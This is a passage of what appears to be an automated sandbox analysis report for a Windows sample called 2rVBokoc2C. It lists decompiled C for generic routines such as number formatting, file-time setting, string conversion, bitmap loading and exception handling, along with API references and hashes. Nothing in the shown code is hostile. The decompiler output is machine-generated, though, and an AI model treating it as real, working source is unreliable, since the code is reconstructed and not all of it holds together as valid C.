									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00BBE340( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xbc4881
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00BBF1A0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00BBE340( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00BBE660();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00BBE660();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00BBE660();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00BC9361(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00BD1960(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00BC87DA();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00BC86B9();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x00bc905e
0x00bc9069
0x00bc9070
0x00bc9072
0x00bc9072
0x00bc9074
0x00bc907d
0x00bc907f
0x00bc9084
0x00bc908a
0x00bc90a0
0x00bc90a5
0x00bc90a8
0x00bc90b5
0x00bc90ba
0x00bc910e
0x00bc9116
0x00bc9118
0x00bc911a
0x00bc911d
0x00bc911d
0x00bc911d
0x00bc9123
0x00bc912b
0x00bc913e
0x00bc9141
0x00bc9143
0x00bc9146
0x00bc9147
0x00bc9168
0x00bc916b
0x00bc916b
0x00bc9149
0x00bc9149
0x00bc914b
0x00bc9156
0x00bc9156
0x00bc9158
0x00bc915f
0x00bc915a
0x00bc915a
0x00bc915a
0x00bc9158
0x00bc916c
0x00bc916e
0x00bc916f
0x00bc9172
0x00bc9174
0x00bc9188
0x00bc9176
0x00bc9176
0x00bc9176
0x00bc918d
0x00bc918d
0x00bc9192
0x00bc9195
0x00bc91a0
0x00bc91a0
0x00bc91a0
0x00bc91a0
0x00bc91a4
0x00bc91ab
0x00bc91ac
0x00bc91af
0x00bc91b2
0x00bc91b2
0x00bc91b4
0x00000000
0x00000000
0x00bc91cc
0x00bc91d3
0x00bc91d7
0x00bc91da
0x00bc91dd
0x00bc91df
0x00bc91df
0x00bc91df
0x00bc91e1
0x00bc91e4
0x00bc91e7
0x00bc91e9
0x00bc91f1
0x00bc91f7
0x00bc91fa
0x00bc91fd
0x00bc91fe
0x00bc9201
0x00bc9204
0x00bc9204
0x00bc9209
0x00bc920c
0x00000000
0x00000000
0x00bc9224
0x00bc9229
0x00bc922d
0x00000000
0x00000000
0x00bc9231
0x00bc9231
0x00bc9234
0x00bc9235
0x00bc9235
0x00bc9237
0x00bc923a
0x00000000
0x00000000
0x00bc923c
0x00bc923f
0x00bc9246
0x00bc9249
0x00bc924c
0x00bc9262
0x00bc9262
0x00bc9262
0x00bc924e
0x00bc924e
0x00bc9250
0x00bc9253
0x00bc925e
0x00bc9255
0x00bc9258
0x00bc9258
0x00bc9253
0x00000000
0x00bc924c
0x00bc9241
0x00bc9241
0x00bc9243
0x00bc9243
0x00bc9197
0x00bc9197
0x00bc919a
0x00bc9265
0x00bc9265
0x00bc9267
0x00bc9269
0x00bc926c
0x00bc926d
0x00bc926e
0x00bc926f
0x00bc9277
0x00bc9277
0x00bc9277
0x00bc9279
0x00bc927c
0x00bc927f
0x00bc9281
0x00bc9281
0x00bc9283
0x00bc9295
0x00bc9299
0x00bc929c
0x00bc92a3
0x00bc92ab
0x00bc92ab
0x00bc92ae
0x00bc92b0
0x00bc92c1
0x00bc92c1
0x00bc92c5
0x00bc92c5
0x00bc92c8
0x00bc92ca
0x00bc92cd
0x00000000
0x00bc92b2
0x00bc92b2
0x00bc92b8
0x00bc92b8
0x00bc92bc
0x00bc92cf
0x00bc92cf
0x00bc92d3
0x00bc92d4
0x00bc92d6
0x00bc92d8
0x00bc9319
0x00bc9319
0x00bc931b
0x00bc9328
0x00bc9328
0x00bc932a
0x00bc932c
0x00bc932d
0x00bc932e
0x00bc9335
0x00bc9338
0x00bc933a
0x00bc933a
0x00bc933b
0x00bc933d
0x00bc9340
0x00bc9340
0x00bc9342
0x00bc9344
0x00000000
0x00bc9344
0x00bc931d
0x00bc931f
0x00000000
0x00000000
0x00bc9321
0x00000000
0x00000000
0x00bc9323
0x00bc9326
0x00000000
0x00000000
0x00000000
0x00bc9326
0x00bc92df
0x00bc92e5
0x00bc92e5
0x00bc92e7
0x00bc92e8
0x00bc92e9
0x00bc92ea
0x00bc92f1
0x00bc92f4
0x00bc92f6
0x00bc92f7
0x00bc92f9
0x00bc9306
0x00bc9306
0x00bc9308
0x00bc930a
0x00bc930b
0x00bc930c
0x00bc9313
0x00bc9316
0x00bc9318
0x00bc9318
0x00000000
0x00bc9318
0x00bc92fb
0x00bc92fb
0x00bc92fd
0x00000000
0x00000000
0x00bc92ff
0x00000000
0x00000000
0x00bc9301
0x00bc9304
0x00000000
0x00000000
0x00000000
0x00bc9304
0x00bc92e1
0x00bc92e3
0x00000000
0x00000000
0x00000000
0x00bc92e3
0x00bc92b4
0x00bc92b6
0x00000000
0x00000000
0x00000000
0x00bc92b6
0x00bc92b0
0x00000000
0x00bc919a
0x00bc9195
0x00bc90bc
0x00bc90be
0x00000000
0x00bc90c0
0x00bc90d6
0x00bc90db
0x00bc90dd
0x00bc90e9
0x00bc90ef
0x00bc90f0
0x00bc90f2
0x00bc90f4
0x00bc90ff
0x00bc90ff
0x00bc9102
0x00bc9104
0x00bc9104
0x00bc9107
0x00bc90df
0x00bc90df
0x00bc90df
0x00000000
0x00bc90dd
0x00bc908c
0x00bc908c
0x00bc9093
0x00bc9094
0x00bc9096
0x00bc9348
0x00bc934c
0x00bc9351
0x00bc9351
0x00bc9360
0x00bc9360

APIs

_strrchr.LIBCMT ref: 00BC90E9
__alldvrm.LIBCMT ref: 00BC92EA
__alldvrm.LIBCMT ref: 00BC930C

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 5368bc68b7d4e75d7d9cee32b5eb0aa7715ff483d2baf0e8f8fec88c13379cf7
Instruction ID: 6d8128204f97739091b887f5b878397c2e70cdf20802bc3311f9801ba0d83e00
Opcode Fuzzy Hash: 5368bc68b7d4e75d7d9cee32b5eb0aa7715ff483d2baf0e8f8fec88c13379cf7
Instruction Fuzzy Hash: A2A11572A04386AFFB218E58C89AFAEBBE5EF55310F1841EDE495AB281C7348941C754

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA1EB Relevance: 6.1, APIs: 4, Instructions: 127
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00BAA1EB(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E00BBE1C0();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E00BAA0D4( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E00BAA384( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E00BB0B3D(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E00BB0B3D(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E00BB0B3D(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E00BAA384( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E00BAB5AC( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}

0x00baa1eb
0x00baa1f0
0x00baa1fc
0x00baa203
0x00baa207
0x00baa214
0x00baa214
0x00baa218
0x00baa218
0x00baa221
0x00baa22e
0x00baa22e
0x00baa232
0x00baa232
0x00baa23b
0x00baa249
0x00baa249
0x00baa24d
0x00baa254
0x00baa259
0x00baa260
0x00baa276
0x00baa266
0x00baa26f
0x00baa26f
0x00baa291
0x00baa297
0x00baa29e
0x00baa2e8
0x00baa2ed
0x00baa2f6
0x00baa2f6
0x00baa300
0x00baa309
0x00baa309
0x00baa313
0x00baa31c
0x00baa31c
0x00baa32c
0x00baa330
0x00baa340
0x00baa350
0x00baa356
0x00baa35d
0x00baa365
0x00baa372
0x00baa372
0x00000000
0x00baa2a0
0x00baa2b1
0x00baa2b8
0x00baa377
0x00baa381
0x00baa381
0x00baa2d5
0x00baa2db
0x00baa2e2
0x00000000
0x00000000
0x00000000
0x00baa2e2
0x00baa29e
0x00baa243
0x00baa247
0x00000000
0x00000000
0x00000000
0x00baa247
0x00baa228
0x00baa22c
0x00000000
0x00000000
0x00000000
0x00baa22c
0x00baa20e
0x00baa212
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00BA808F,?,?,?), ref: 00BAA291
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00BA808F,?,?), ref: 00BAA2D5
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00BA808F,?,?,?,?,?,?,?,?), ref: 00BAA356
CloseHandle.KERNEL32(?,?,00000000,?,00BA808F,?,?,?,?,?,?,?,?,?,?,?), ref: 00BAA35D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: ef0adeed252501c539a0e63dd055aafd695b2aeaa574c29f4f2668dbd7dbc37a
Instruction ID: 5ba39963a7f6b3f39d9870cefce7dbdafb16b70ece39894b33237c36aa91cb76
Opcode Fuzzy Hash: ef0adeed252501c539a0e63dd055aafd695b2aeaa574c29f4f2668dbd7dbc37a
Instruction Fuzzy Hash: 0441BF3128C381ABE731DF24DC55BEABBE8AB96700F140999B5D0D3180D7659A48DB63

Uniqueness

Uniqueness Score: -1.00%

Function 00BCBF68 Relevance: 6.1, APIs: 4, Instructions: 110
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E00BCBF68(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0xbdd668; // 0xb57946a0
				_v8 = _t34 ^ _t70;
				E00BC3C16(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x7fe85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00BBEA8A(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00BBF1A0(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00BCA140(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00BC8398(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00BD1870();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x00bcbf70
0x00bcbf77
0x00bcbf83
0x00bcbf88
0x00bcbf8d
0x00bcbf92
0x00bcbf92
0x00bcbf95
0x00bcbf97
0x00bcbf97
0x00bcbf9c
0x00bcbfb5
0x00bcbfbb
0x00bcbfc0
0x00bcc05f
0x00bcc063
0x00bcc068
0x00bcc068
0x00bcc084
0x00bcc084
0x00bcbfc6
0x00bcbfce
0x00bcbfd2
0x00bcc01e
0x00bcc020
0x00bcc022
0x00bcc027
0x00bcc03e
0x00bcc046
0x00bcc056
0x00bcc056
0x00bcc046
0x00bcc058
0x00bcc059
0x00000000
0x00bcc05e
0x00bcbfd9
0x00bcbfdb
0x00bcbfdd
0x00bcbfe5
0x00bcc002
0x00bcc00c
0x00bcc011
0x00000000
0x00000000
0x00bcc013
0x00bcc019
0x00bcc019
0x00000000
0x00bcc019
0x00bcbfe9
0x00bcbfed
0x00bcbff2
0x00bcbff6
0x00000000
0x00000000
0x00bcbff8
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,7FE85006,00BC3DA6,00000000,00000000,00BC4DDB,?,00BC4DDB,?,00000001,00BC3DA6,7FE85006,00000001,00BC4DDB,00BC4DDB), ref: 00BCBFB5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BCC03E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00BCC050
__freea.LIBCMT ref: 00BCC059

Part of subcall function 00BC8398: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC3866,?,0000015D,?,?,?,?,00BC4D42,000000FF,00000000,?,?), ref: 00BC83CA

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 0890791b5b4c2782374a459f8d944217d102b1b5ee41fb610dd63303324f6e63
Instruction ID: 6b3e19107cd0047406d03ab11b7e500290357365690b762eaab32bb89e23a2eb
Opcode Fuzzy Hash: 0890791b5b4c2782374a459f8d944217d102b1b5ee41fb610dd63303324f6e63
Instruction Fuzzy Hash: EF31B072A0021AABDB259F64CC55EAE7BE5EB50710F0442ADFC18E7290EB35CD54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAD3D Relevance: 6.1, APIs: 4, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BBAD3D(void* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t18;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				void* _t32;

				_t32 = __fp0;
				_t21 = __edx;
				_t22 = LoadBitmapW( *0xbdfed0, 0x65);
				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
				_t28 = _t19;
				if(_t19 != 0) {
					_t22 = E00BB9D9A(0x65);
				}
				GetObjectW(_t22, 0x18,  &_v28);
				if(E00BB9C8A(_t28) != 0) {
					if(_t19 != 0) {
						_t26 = E00BB9D9A(0x66);
						if(_t26 != 0) {
							DeleteObject(_t22);
							_t22 = _t26;
						}
					}
					_t11 = E00BB9CEC(_v20);
					_t13 = E00BB9EDB(_t21, _t32, _t22, E00BB9CA9(_v24), _t11);
					DeleteObject(_t22);
					_t22 = _t13;
				}
				return _t22;
			}

0x00bbad3d
0x00bbad3d
0x00bbad53
0x00bbad57
0x00bbad5a
0x00bbad5c
0x00bbad65
0x00bbad65
0x00bbad6e
0x00bbad7b
0x00bbad80
0x00bbad89
0x00bbad8d
0x00bbad90
0x00bbad96
0x00bbad96
0x00bbad8d
0x00bbad9b
0x00bbadab
0x00bbadb3
0x00bbadb9
0x00bbadbb
0x00bbadc3

APIs

LoadBitmapW.USER32(00000065), ref: 00BBAD4D
GetObjectW.GDI32(00000000,00000018,?), ref: 00BBAD6E
DeleteObject.GDI32(00000000), ref: 00BBAD90
DeleteObject.GDI32(00000000), ref: 00BBADB3

Part of subcall function 00BB9D9A: FindResourceW.KERNEL32(00BBAD89,PNG,?,?,?,00BBAD89,00000066), ref: 00BB9DAC
Part of subcall function 00BB9D9A: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00BBAD89,00000066), ref: 00BB9DC4
Part of subcall function 00BB9D9A: LoadResource.KERNEL32(00000000,?,?,?,00BBAD89,00000066), ref: 00BB9DD7
Part of subcall function 00BB9D9A: LockResource.KERNEL32(00000000,?,?,?,00BBAD89,00000066), ref: 00BB9DE2

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID:
API String ID: 142272564-0
Opcode ID: df3e36de2097e5f868e3b921cce894e1a4c3294cdd2f34ad200165f723ee9148
Instruction ID: 5d585af8a78b7a5c4c5e660d428f348bda656a495cb3a6672aa063f70a26088b
Opcode Fuzzy Hash: df3e36de2097e5f868e3b921cce894e1a4c3294cdd2f34ad200165f723ee9148
Instruction Fuzzy Hash: F901F73298020577D61137255C46BFFBBEDEF81B52F0D00A1FE44A7296DEA28C0182A1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2319 Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 20%

			E00BC2319(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E00BC2968(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E00BBFA5B(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00BC2B6A(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00BC2123(_t29, _t32, _t37);
				if(_t25 != 0) {
					E00BBFA29(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x00bc2319
0x00bc2319
0x00bc231c
0x00bc2321
0x00bc2324
0x00bc2326
0x00bc2329
0x00bc232c
0x00bc232d
0x00bc2330
0x00bc2335
0x00bc2335
0x00bc2338
0x00bc233c
0x00bc233f
0x00bc2344
0x00bc2341
0x00bc2341
0x00bc2341
0x00bc2347
0x00bc234d
0x00bc2350
0x00bc2352
0x00bc2355
0x00bc2358
0x00bc2359
0x00bc2362
0x00bc2367
0x00bc236a
0x00bc2370
0x00bc2373
0x00bc2376
0x00bc2379
0x00bc237a
0x00bc237d
0x00bc2388
0x00bc238c
0x00000000
0x00bc238c
0x00bc2393

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00BC2330

Part of subcall function 00BC2968: ___AdjustPointer.LIBCMT ref: 00BC29B2

_UnwindNestedFrames.LIBCMT ref: 00BC2347
___FrameUnwindToState.LIBVCRUNTIME ref: 00BC2359
CallCatchBlock.LIBVCRUNTIME ref: 00BC237D

